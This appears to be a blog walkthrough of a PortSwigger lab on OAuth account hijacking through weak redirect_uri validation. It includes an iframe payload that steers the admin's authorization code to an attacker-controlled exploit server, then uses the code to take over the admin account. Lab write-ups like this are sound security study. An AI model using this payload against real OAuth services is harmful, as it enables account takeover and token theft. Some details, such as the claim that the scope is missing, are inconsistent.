Skip to main content

Command Palette

Search for a command to run...

LAB#03 OAuth account hijacking via redirect_uri

Understanding and exploiting an insecure redirect_uri validation in OAuth.

Updated
2 min readView as Markdown
LAB#03 OAuth account hijacking via redirect_uri
A
I write about cybersecurity, and simple tech guides.

Lab Overview

This lab uses an OAuth service to allow users to log in with their social media account. A misconfiguration by the OAuth provider makes it possible for an attacker to steal authorization codes associated with other users' accounts.

To solve the lab, steal an authorization code associated with the admin user, then use it to access their account and delete the user carlos.

The admin user will open anything you send from the exploit server and they always have an active session with the OAuth service.

Credentials:
Username: wiener
Password: peter

Exploitation

#1 Logging In

By clicking My account it will redirect to social media login.

When redirection happens, it is sending a GET request to /auth.

client_id: d29pyj8d1qb33zo061roj redirect_uri: https://0a7000d10463074782fc799300210026.web-security-academy.net/oauth-callback response_type: code scope: openid%20profile%20email

Here we can see that the scope is missing. scope specifies the permissions being requested (e.g., openid profile email).

Now login with credentials.

OAuth callback request containing the authorization code. lets modify the redirect_uri to our exploit server and capture the victim's code parameter.

Here we can see it is redirecting to evil.net and the code is reusable.

#2 Crafting the Payload

Crafting the CSRF payload to get the code from the victim.

<html>
    <head>
        <title>PAYLOAD</title>
    </head>
    <body>
        <iframe src="https://oauth-0a5900bd036f8961807c010902b60022.oauth-server.net/auth?client_id=v7j8CfcXOUHq9knuM7spVQtEL7gRqBej8-Iag9rV2mh&redirect_uri=https://exploit-0acb000d033689718055022f01cb0047.exploit-server.net/exploit/log&response_type=code&scope=openid%20profile%20email"></iframe>
    </body>
</html>

Store the exploit and deliver the exploit to the victim, then go back to the access log and copy the victim's code from the resulting request.

#3 Admin Access

After logging out, open the following URL with the stolen OAuth code

We got Admin panel access.

Open the admin panel and delete carlos to solve the lab.

Deleted carlos!

# And That’s a Wrap

OAuth authorization codes must be protected, as exposing them can result in account takeover.

Portswigger Labs Journal

Part 1 of 3

Solve PortSwigger Web Security Academy labs with simple, practical walkthroughs covering web vulnerabilities, Burp Suite techniques, exploitation methods, and real world penetration testing skills.

Up next

LAB #02 Forced OAuth profile linking

Understanding and exploiting an insecure OAuth account-linking implementation.